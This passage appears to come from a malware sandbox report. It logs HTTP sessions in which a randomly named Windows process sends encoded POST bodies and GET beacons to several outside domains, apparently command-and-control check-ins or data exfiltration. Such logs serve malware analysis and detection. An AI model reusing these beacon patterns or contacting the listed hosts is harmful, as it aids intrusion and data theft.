Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	61435	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:32.929574966 CEST	793	OUT	POST /gvk0/ HTTP/1.1 Host: www.dennisrosenberg.studio Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.dennisrosenberg.studio Referer: http://www.dennisrosenberg.studio/gvk0/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 43 44 4d 66 6e 49 38 43 61 6c 7a 6f 2b 6a 33 79 68 79 6c 73 38 7a 7a 4a 68 6d 4f 75 69 6a 48 31 30 7a 31 33 58 6c 5a 54 59 5a 71 73 4a 54 6a 49 2b 38 7a 74 31 6f 69 56 75 56 37 76 75 39 4d 2b 6b 4a 4d 4f 34 73 32 32 35 4d 44 44 62 34 6f 4d 70 35 4b 4e 55 52 6a 77 77 64 76 2b 30 47 6e 6e 46 65 4c 71 59 37 72 49 45 4f 70 42 79 69 48 47 33 79 39 6c 75 6f 76 63 62 77 48 61 75 75 4b 78 37 68 6c 6b 63 46 41 7a 38 56 58 6d 75 44 4b 56 4a 43 68 74 35 59 73 65 32 62 36 7a 6d 4f 74 34 61 77 6d 30 32 50 6e 48 52 54 58 70 55 4a 53 6d 54 34 65 37 6d 4f 49 31 45 74 69 5a 41 5a 4d 38 48 79 6b 32 44 7a 34 4d 59 44 32 59 44 77 53 78 39 49 33 70 4f 49 48 34 53 75 31 41 Data Ascii: iJiX_=CDMfnI8Calzo+j3yhyls8zzJhmOuijH10z13XlZTYZqsJTjI+8zt1oiVuV7vu9M+kJMO4s225MDDb4oMp5KNURjwwdv+0GnnFeLqY7rIEOpByiHG3y9luovcbwHauuKx7hlkcFAz8VXmuDKVJCht5Yse2b6zmOt4awm02PnHRTXpUJSmT4e7mOI1EtiZAZM8Hyk2Dz4MYD2YDwSx9I3pOIH4Su1A
Jul 3, 2024 08:34:33.583518028 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:34:33 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	61436	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:35.594430923 CEST	1810	OUT	POST /gvk0/ HTTP/1.1 Host: www.dennisrosenberg.studio Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.dennisrosenberg.studio Referer: http://www.dennisrosenberg.studio/gvk0/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 43 44 4d 66 6e 49 38 43 61 6c 7a 6f 2b 6a 33 79 68 79 6c 73 38 7a 7a 4a 68 6d 4f 75 69 6a 48 31 30 7a 31 33 58 6c 5a 54 59 5a 79 73 4a 67 72 49 73 4c 6e 74 32 6f 69 56 76 56 37 75 75 39 4d 33 6b 4a 55 4b 34 73 36 35 35 50 72 44 59 62 77 4d 35 59 4b 4e 64 52 6a 77 34 39 76 2f 77 47 6d 74 46 65 37 75 59 36 62 49 45 4f 70 42 79 67 66 47 68 57 4a 6c 6f 6f 76 62 53 51 47 62 2f 2b 4b 56 37 68 38 52 63 46 31 45 38 6c 33 6d 70 6a 61 56 49 30 56 74 6b 6f 73 63 69 37 37 67 6d 4f 78 6e 61 32 44 4e 32 50 53 67 52 52 33 70 43 74 2f 74 47 38 4f 74 7a 2f 73 5a 41 71 4b 2f 50 37 77 37 4b 69 6f 61 41 79 6f 44 54 54 37 78 4f 42 69 73 36 5a 58 6e 62 35 37 52 41 4f 49 73 56 66 37 31 33 6b 78 64 75 78 32 44 34 61 59 4d 51 58 68 65 44 5a 52 4b 31 32 46 48 73 7a 48 76 46 72 70 31 43 33 48 5a 4a 47 35 57 65 76 2b 41 6f 6e 64 6e 39 50 6b 78 4c 42 4d 5a 61 48 6e 37 54 71 4d 66 64 42 71 31 6f 31 33 4e 68 52 79 74 38 4a 73 48 67 32 54 72 44 66 73 71 63 50 44 4c 73 71 41 4d 52 53 7a 4a 67 62 43 35 48 4d 61 38 [TRUNCATED] Data Ascii: iJiX_=CDMfnI8Calzo+j3yhyls8zzJhmOuijH10z13XlZTYZysJgrIsLnt2oiVvV7uu9M3kJUK4s655PrDYbwM5YKNdRjw49v/wGmtFe7uY6bIEOpBygfGhWJloovbSQGb/+KV7h8RcF1E8l3mpjaVI0Vtkosci77gmOxna2DN2PSgRR3pCt/tG8Otz/sZAqK/P7w7KioaAyoDTT7xOBis6ZXnb57RAOIsVf713kxdux2D4aYMQXheDZRK12FHszHvFrp1C3HZJG5Wev+Aondn9PkxLBMZaHn7TqMfdBq1o13NhRyt8JsHg2TrDfsqcPDLsqAMRSzJgbC5HMa8lnS/TTKe+wUeTKUK6uS6l55bA484kkn0tANyOfqDCoOU1rZNh24CBgO54pP0eKUhJFjd5SkkUeMF8ug/IuTHmnUaSlsaJ7HbP690dca3eERq975j+uhoH+mAnnY7Y1tG0paSM2iEi4UH1n0N8Bjw/D3BQw5ntBsNccqdyIRCi/mdTXCj3ARjP3NlaUXb6n/MbVlLAU06FGxLew3J5uMvPrg3iAdteibI1ITWaWsTSKM02NEE0LsAnsZMdVKAx5MCvkVMMhE3RH1hbfnZO6l57Vjf8aTXqMuvhQFU724cobhqY878VO5qcWJuCTCVryJdS9ZhiGeiR1fGLuNmDNngDZy0IFhIpyANz5EXdxF7LgEvdzBvtkMaspZYK6f+kahEQqSj5oTtnfvV30jbBxX4p/Um2moIGLEkRUumIwZu5vh7H5VgeUGRuTyNF1XcuXFpYeWhBOznbFjF4gcmHKNhIq6UuVsFoIfHcQraFJVfaueURne/Yyo+QDISvimXsX2nqtCgyabLjVRlWUjhB1/sx19Me3HocZsYrLdKHMQGiPh64M8q+FDM+Py7vguGm09iJDZCI9DWeDjMsQ3meUlZAi4zwEMsXap/8wbGJqYRa8rxv9oZmN0lCXviiL/XFz2nheo6seN2fWEXxbL3O4QS+3FmjtQgZVLmyz [TRUNCATED]
Jul 3, 2024 08:34:36.251281023 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:34:36 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	61437	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:38.210601091 CEST	489	OUT	GET /gvk0/?eZ=3HYLM&iJiX_=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PYRv9+O/t9WvMGJPSRuXiPeF8kiiDoShqgPK5SBbSxKLjpw== HTTP/1.1 Host: www.dennisrosenberg.studio Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:34:38.841934919 CEST	113	IN	HTTP/1.1 439 date: Wed, 03 Jul 2024 06:34:38 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	61438	212.227.172.254	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:52.027029037 CEST	773	OUT	POST /4ksh/ HTTP/1.1 Host: www.ennerdaledevcons.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.ennerdaledevcons.co.uk Referer: http://www.ennerdaledevcons.co.uk/4ksh/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 5a 54 4f 49 42 4f 76 4e 58 61 53 7a 6e 31 6c 31 33 6f 54 36 44 50 79 62 48 71 54 48 58 34 33 43 44 51 34 55 51 39 78 77 45 48 66 65 44 32 2f 42 4b 66 71 36 2f 66 59 6d 45 39 58 6f 63 47 70 6c 36 56 71 6f 4f 6e 74 50 37 4f 5a 62 4e 6f 4a 35 46 6e 38 68 56 32 66 31 4a 48 71 4e 31 6f 63 4b 4e 66 74 46 55 75 33 74 4e 34 56 6a 4d 4d 73 48 6c 4b 50 35 79 65 79 36 75 44 37 4f 42 7a 36 69 2f 4c 66 39 49 30 36 37 53 53 77 75 62 43 66 55 33 70 66 44 78 51 4f 65 75 30 42 4c 6b 6f 77 38 63 53 67 63 6f 69 4e 6c 6c 6b 64 46 52 41 4b 64 43 70 52 72 55 4a 62 65 64 2b 65 31 70 55 7a 4f 50 68 48 68 6f 39 67 3d Data Ascii: iJiX_=ZTOIBOvNXaSzn1l13oT6DPybHqTHX43CDQ4UQ9xwEHfeD2/BKfq6/fYmE9XocGpl6VqoOntP7OZbNoJ5Fn8hV2f1JHqN1ocKNftFUu3tN4VjMMsHlKP5yey6uD7OBz6i/Lf9I067SSwubCfU3pfDxQOeu0BLkow8cSgcoiNllkdFRAKdCpRrUJbed+e1pUzOPhHho9g=
Jul 3, 2024 08:34:52.650649071 CEST	434	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 03 Jul 2024 06:34:52 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ennerdaledevcons.co.uk/4ksh/ Expires: Wed, 03 Jul 2024 06:54:52 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	61439	212.227.172.254	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:54.558535099 CEST	793	OUT	POST /4ksh/ HTTP/1.1 Host: www.ennerdaledevcons.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 226 Content-Type: application/x-www-form-urlencoded Origin: http://www.ennerdaledevcons.co.uk Referer: http://www.ennerdaledevcons.co.uk/4ksh/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 5a 54 4f 49 42 4f 76 4e 58 61 53 7a 6f 31 35 31 37 71 37 36 46 76 79 63 62 36 54 48 5a 59 32 4a 44 58 77 55 51 38 30 31 48 78 50 65 47 6e 6a 42 4c 65 71 36 79 2f 59 6d 50 64 58 70 53 6d 6f 6e 36 56 6d 4f 4f 6c 4a 50 37 4b 35 62 4e 70 35 35 47 51 41 2b 55 6d 66 33 64 33 71 44 36 49 63 4b 4e 66 74 46 55 71 61 43 4e 34 4e 6a 4d 38 38 48 6b 72 50 36 2f 2b 79 35 70 44 37 4f 46 7a 36 75 2f 4c 66 50 49 31 6d 46 53 55 30 75 62 41 33 55 33 39 7a 41 2f 51 4f 59 7a 45 41 5a 71 59 78 46 53 68 30 6b 74 46 6c 66 75 58 78 66 55 32 6e 33 59 4c 5a 74 58 4a 7a 31 64 39 32 44 73 6a 75 6d 56 43 58 52 32 71 33 2f 72 6c 30 44 4e 36 68 71 47 35 4d 31 43 56 34 52 46 41 42 52 Data Ascii: iJiX_=ZTOIBOvNXaSzo1517q76Fvycb6THZY2JDXwUQ801HxPeGnjBLeq6y/YmPdXpSmon6VmOOlJP7K5bNp55GQA+Umf3d3qD6IcKNftFUqaCN4NjM88HkrP6/+y5pD7OFz6u/LfPI1mFSU0ubA3U39zA/QOYzEAZqYxFSh0ktFlfuXxfU2n3YLZtXJz1d92DsjumVCXR2q3/rl0DN6hqG5M1CV4RFABR
Jul 3, 2024 08:34:55.202064037 CEST	434	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 03 Jul 2024 06:34:55 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ennerdaledevcons.co.uk/4ksh/ Expires: Wed, 03 Jul 2024 06:54:55 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	61440	212.227.172.254	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:34:57.393690109 CEST	1810	OUT	POST /4ksh/ HTTP/1.1 Host: www.ennerdaledevcons.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 1242 Content-Type: application/x-www-form-urlencoded Origin: http://www.ennerdaledevcons.co.uk Referer: http://www.ennerdaledevcons.co.uk/4ksh/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 5a 54 4f 49 42 4f 76 4e 58 61 53 7a 6f 31 35 31 37 71 37 36 46 76 79 63 62 36 54 48 5a 59 32 4a 44 58 77 55 51 38 30 31 48 78 48 65 47 31 48 42 4b 35 32 36 39 66 59 6d 43 39 58 30 53 6d 70 2f 36 56 4f 4b 4f 6c 45 79 37 4d 31 62 4f 50 46 35 48 6b 55 2b 62 6d 66 33 66 33 71 4f 31 6f 63 66 4e 66 38 4d 55 71 71 43 4e 34 4e 6a 4d 36 34 48 6a 36 50 36 73 4f 79 36 75 44 37 38 42 7a 36 43 2f 4c 47 34 49 31 69 56 53 45 55 75 65 51 6e 55 34 75 4c 41 67 41 4f 61 79 45 42 63 71 59 39 6b 53 68 34 6f 74 41 5a 31 75 55 68 66 56 51 54 76 4b 62 42 55 57 5a 58 6e 51 36 32 46 76 43 65 37 53 53 58 32 30 49 69 65 75 41 51 70 61 4a 68 38 42 34 4d 39 56 55 31 4b 4c 33 38 6a 76 66 74 78 49 4c 5a 67 67 4c 34 38 34 4c 54 36 79 79 31 35 75 54 2f 52 75 74 4b 45 2b 6c 61 31 39 49 34 71 78 50 6c 6d 6c 6d 6e 33 33 2f 34 55 44 48 6a 72 6c 6b 31 78 64 52 52 70 64 65 55 5a 32 56 52 6f 6d 68 74 72 79 52 6c 69 76 32 30 57 72 30 44 73 57 61 43 63 6e 4f 78 5a 31 44 34 59 38 4e 50 47 33 6f 34 54 55 66 54 74 42 57 70 43 [TRUNCATED] Data Ascii: iJiX_=ZTOIBOvNXaSzo1517q76Fvycb6THZY2JDXwUQ801HxHeG1HBK5269fYmC9X0Smp/6VOKOlEy7M1bOPF5HkU+bmf3f3qO1ocfNf8MUqqCN4NjM64Hj6P6sOy6uD78Bz6C/LG4I1iVSEUueQnU4uLAgAOayEBcqY9kSh4otAZ1uUhfVQTvKbBUWZXnQ62FvCe7SSX20IieuAQpaJh8B4M9VU1KL38jvftxILZggL484LT6yy15uT/RutKE+la19I4qxPlmlmn33/4UDHjrlk1xdRRpdeUZ2VRomhtryRliv20Wr0DsWaCcnOxZ1D4Y8NPG3o4TUfTtBWpCf5BRgqi283zOE0lRyXshC2jVweiNrPOMp1AjmYaMdz3q9ij8mgHeqlKXWOCk305txVT79PVZ+uQ4QDTneXMj/v0MHawkV6UNwC5eTR4XZoM1QtJwvs33i/XGGaRjzNYG9lE+Twd8T2atK0w8trBbf4t4Hp986tBzchOrDaGCK7XGCR9/iOTY8DUls9b38nwFZY85GPFYMbEyqD6bk1/qPi/b5ymV4pYImIjbOLrDtQ43wznLIa+viqx2KfiCltjEnCC+jdxzW6VBC5FAM9qKbPO9vgIJGiHER6zrSlzScOITeRufRRwxDMPOcU98Yihfd0qg54iN74NW6KkbD5DEH2tY65X5K3XC9vvYuMIQFMdSrOgmqOQ30WmhoBCTQRW9gfOd9Jt0Zen+o8Cxv7Igr2j84UdLNh3PnvV2fpCkcUaVh+s7uTCdbGqIvllbpzFGJIjqhSlXulCY7aXnY6734Il4cU7ZaX086zJ2yHVYYqR7PilXYGiFJUX1HAxqP+PPoK2iAq5S/TU5yBTxLIZFMneLTKA0Cq0h2DW7N0ppotMivqpGuMiwhyryS26uRoDlC22pIxr96cF2nhrLBGxtuEFPIJ9Yt9Fvu2TqWLYuCt4UfjtfIuLzQlqwlShMmAniZnbCpOXKByqPk2z1sfSK2H3OifFHjVivyf [TRUNCATED]
Jul 3, 2024 08:34:58.028501034 CEST	434	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 03 Jul 2024 06:34:57 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ennerdaledevcons.co.uk/4ksh/ Expires: Wed, 03 Jul 2024 06:54:57 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	61441	212.227.172.254	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:00.489221096 CEST	489	OUT	GET /4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfZlnLf1iW05ccEvRvL6OrWq1JPJo5l6rk1ZbisRWcHyTHqg== HTTP/1.1 Host: www.ennerdaledevcons.co.uk Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Jul 3, 2024 08:35:01.113575935 CEST	582	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 03 Jul 2024 06:35:01 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ennerdaledevcons.co.uk/4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfZlnLf1iW05ccEvRvL6OrWq1JPJo5l6rk1ZbisRWcHyTHqg== Expires: Wed, 03 Jul 2024 06:55:01 GMT Cache-Control: max-age=1200 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	61442	91.195.240.19	80	6880	C:\Program Files (x86)\ZbSDFslviKIFedZkSUgKtKQRuMdiZYRzTkQTcBwsci\UQgCFxrqyzfeJVhlwgINlmFOLs.exe

Timestamp	Bytes transferred	Direction	Data
Jul 3, 2024 08:35:14.452619076 CEST	770	OUT	POST /9285/ HTTP/1.1 Host: www.artemhypnotherapy.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Connection: close Cache-Control: max-age=0 Content-Length: 206 Content-Type: application/x-www-form-urlencoded Origin: http://www.artemhypnotherapy.com Referer: http://www.artemhypnotherapy.com/9285/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Data Raw: 69 4a 69 58 5f 3d 2b 36 6b 78 4e 59 63 4e 4c 61 39 6f 32 66 44 50 54 6b 4a 70 4b 79 61 53 2b 4b 54 65 46 55 36 32 67 66 65 38 48 31 52 58 32 4a 4e 54 4d 4d 6c 75 37 32 61 71 2f 56 53 2f 62 77 61 68 50 6e 45 54 73 4f 75 69 68 59 58 6e 64 51 49 74 70 65 47 68 6b 42 37 62 54 4a 68 79 48 57 70 77 67 61 37 67 79 31 34 61 63 4f 68 56 4d 77 6a 6a 4a 6a 42 7a 48 7a 53 46 4a 73 50 52 4d 76 69 67 61 79 36 53 69 47 56 6e 31 4c 47 39 4b 6c 2b 33 51 4d 71 61 53 4f 38 35 36 2b 76 34 51 44 55 7a 36 37 38 52 67 6b 74 32 51 4a 39 54 59 69 39 43 30 2f 77 50 4b 4c 6d 50 68 77 49 57 6f 45 6f 73 73 48 64 36 43 31 76 33 58 43 45 3d Data Ascii: iJiX_=+6kxNYcNLa9o2fDPTkJpKyaS+KTeFU62gfe8H1RX2JNTMMlu72aq/VS/bwahPnETsOuihYXndQItpeGhkB7bTJhyHWpwga7gy14acOhVMwjjJjBzHzSFJsPRMvigay6SiGVn1LG9Kl+3QMqaSO856+v4QDUz678Rgkt2QJ9TYi9C0/wPKLmPhwIWoEossHd6C1v3XCE=
Jul 3, 2024 08:35:15.643043041 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Wed, 03 Jul 2024 06:35:15 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
